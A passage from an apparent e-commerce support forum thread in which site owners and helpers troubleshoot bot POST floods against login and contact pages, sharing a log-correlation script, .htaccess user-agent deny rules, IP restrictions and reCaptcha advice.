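203.0.113.10 - - [21/Sep/2022:13:27:57 -0500] "POST /index.php?route=information/contact HTTP/1.1" 200 9861 "-" "{OLD_UA}"
198.51.100.7 - - [21/Sep/2022:13:31:02 -0500] "POST /index.php?route=account/login HTTP/1.1" 302 - "https://shop.example/index.php?route=account/login" "{NEW_UA}"
'''.strip().splitlines()
ERROR_SAMPLE = '''
2022-09-21 13:27:53 - PHP Warning: Undefined array key "email" in /home/example/public_html/catalog/controller/account/login.php on line 160
2022-09-21 13:27:54 - PHP Warning: Undefined array key "password" in /home/example/public_html/catalog/controller/account/login.php on line 174
2022-09-21 13:27:58 - PHP Warning: Undefined array key "enquiry" in /home/example/public_html/catalog/controller/information/contact.php on line 153
'''.strip().splitlines()

if __name__ == "__main__":
    result = correlate(ACCESS_SAMPLE, ERROR_SAMPLE)
    for ip in suspects(result):
        e = result[ip]
        print(f"{ip}: {e['posts']} POSTs, {e['no_referer']} without Referer, "
              f"{e['warnings']} warnings, agents={sorted(e['agents'])}")
```

Run against the https access log, since the http one only records the 301 redirects.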


Post by SScott » Thu Sep 22, 2022 7:50 pm

ADD Creative wrote:
Thu Sep 22, 2022 3:45 am
Does look like a bot. Repeated posts to the same URL and using an out of date user agent. I would start with banning that IP address. If you start seeing it from other IP addresses you can do things like blocking by user agent or empty post data. Other than that, change the code in the controller to at least stop the error log filling up.

I thought I had it nailed down but looked and have a whole new set of IPs doing it. I added the lines below after some googling but it did not help:

Code:

#Redirect empty user agent

RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule .* http://%{REMOTE_ADDR}/ [R,L]

JNeuhoff wrote:
Thu Sep 22, 2022 4:52 pm
Our SpamBot Buster should be able to reject these posts.

Thank you sir. I will look into that right now.

Post by SScott » Thu Sep 22, 2022 8:37 pm

JNeuhoff wrote:
Thu Sep 22, 2022 4:52 pm
Our SpamBot Buster should be able to reject these posts.

@JNeuhoff does this look right for settings?

Image

Post by JNeuhoff » Thu Sep 22, 2022 9:28 pm

@SScott : Yes, looks right to me. If you need help, contact us here.

Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig


Post by ADD Creative » Thu Sep 22, 2022 11:23 pm

SScott wrote:
Thu Sep 22, 2022 7:50 pm
I thought I had it nailed down but looked and have a whole new set of IPs doing it. I added the lines below after some googling but it did not help:

Code:

#Redirect empty user agent

RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule .* http://%{REMOTE_ADDR}/ [R,L]

That will not work as the bot does set a user agent. To block that version of Chrome.

Code:

SetEnvIfNoCase User-Agent "^.*Chrome/85\.0\.4183\.121.*$" bad_bot
Deny from env=bad_bot

Or to block old versions of Chrome.

Code:

SetEnvIfNoCase User-Agent "^.*Chrome/[1-8][0-9]\..*$" bad_bot
Deny from env=bad_bot

Of course the bot could change its user agent just like the IP address.

www.add-creative.co.uk


Post by SScott » Wed Mar 29, 2023 12:40 am

I just wanted to update this instead of making a new thread. The site is just getting hammered by bots attempting to hack in. I can't find a solid way to stop it. For the ADMIN side I have it dialed in with an .htaccess file that will only allow the IP I specify to that section, it forwards all others to another website.

I installed a reCaptcha on the admin side and deleted the .htaccess file and got hammered hard so I re-uploaded the file to stop it.

Now my problem is the normal customer login is getting hammered. There does not seem to be a solution to this. I can't block every single IP, this bandit only lasts a few seconds and then moves to another IP. I don't know what to do other than living with it. I would gladly pay for a real solution.

2023-03-28 9:57:49 - PHP Warning: Undefined array key "g-recaptcha-response" in /home/123/Store123/modification/admin/controller/common/login.php on line 115

2023-03-28 10:42:37 - PHP Warning: Undefined array key "g-recaptcha-response" in /home/123/Store123/modification/admin/controller/common/login.php on line 115
2023-03-28 10:42:49 - PHP Warning: Undefined array key "g-recaptcha-response" in /home/123/Store123/modification/admin/controller/common/login.php on line 115

this goes on to infinity but the post limit is 20,000 characters

Post by ADD Creative » Wed Mar 29, 2023 5:10 am

There is usually something a bot does that a customer wouldn't. Such as a POST with no data. See the topics below for more ideas.

viewtopic.php?t=230843
viewtopic.php?t=225771

www.add-creative.co.uk


Post by JNeuhoff » Wed Mar 29, 2023 5:31 am

@SScott : What's exactly in your access.log ? It could be similar to what was discussed in this forum thread.

Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig


Post by SScott » Wed Mar 29, 2023 10:22 pm

JNeuhoff wrote:
Wed Mar 29, 2023 5:31 am
@SScott : What's exactly in your access.log ? It could be similar to what was discussed in this forum thread.

Yes sir it is. I tried your htaccess method and it did not seem to work so I tried adapting just the RewriteRule to mine that I am using and that did not work so not sure what I did wrong. The way I have it now is working but it is a pain when the girl who does CS uses her phone and is away and I am not near anything to add her new IP.

I am using this for the admin page (and the customer login page I installed an extension to use reCaptcha. I tried installing V3 but could not get it to work so went back to V2 and did the option for invisible)

Code:

RewriteCond %{REMOTE_ADDR} 0.0.0.0 [OR]
RewriteCond %{REMOTE_ADDR} 0.0.0.1
# do nothing
RewriteRule .* - [L]
RewriteRule .* https://www.websitehere.com/ [R=302,L]

Post by JNeuhoff » Wed Mar 29, 2023 11:28 pm

This htaccess doesn't make sense to me.

Anyway, what's in your server's access.log ? That info might help to work out a proper .htaccess content.

Export/Import Tool * SpamBot Buster * Unused Images Manager * Instant Option Price Calculator * Number Option * Google Tag Manager * Survey Plus * OpenTwig

